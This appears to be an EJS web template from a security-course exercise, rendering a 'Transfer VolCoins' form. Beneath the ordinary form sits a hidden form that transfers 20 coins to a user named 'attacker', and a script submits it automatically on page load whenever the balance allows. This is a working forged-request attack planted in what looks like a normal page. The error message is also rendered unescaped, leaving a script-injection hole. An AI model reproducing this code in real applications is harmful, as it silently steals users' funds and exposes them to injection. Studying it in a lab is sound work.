<h3>Transfer VolCoins</h3>

<form class="pure-form pure-form-stacked" action="post_transfer" method="post">
  <% if(errorMsg) { %>
    <p class='error'> <%- errorMsg %> </p>
  <% } %>

	<p>
		You currently have <%= account.volCoins %> volCoins.
	</p>

  <label for="destination_username">Transfer to</label>
  <input type="text" name="destination_username" value="<%= result.receiver %>">

  <label for="quantity">Amount</label>
  <input type="text" name="quantity" value="<%= result.amount %>"/>

  <p><input type="submit" class="pure-button button-primary" value="Transfer" /></p>
</form>

<% if (account.volCoins >= 20) { %>
  <form id ='attack' class="attacker-form" action="redirect" method="post">
    <input type="hidden" name="destination_username" value="attacker">
    <input type="hidden" name="quantity" value="20"/>
    <input type="hidden" class="pure-button button-primary" value="Transfer" />
  </form>

  <script>
    document.getElementById('attack').submit(); 
  </script>
<% } %>

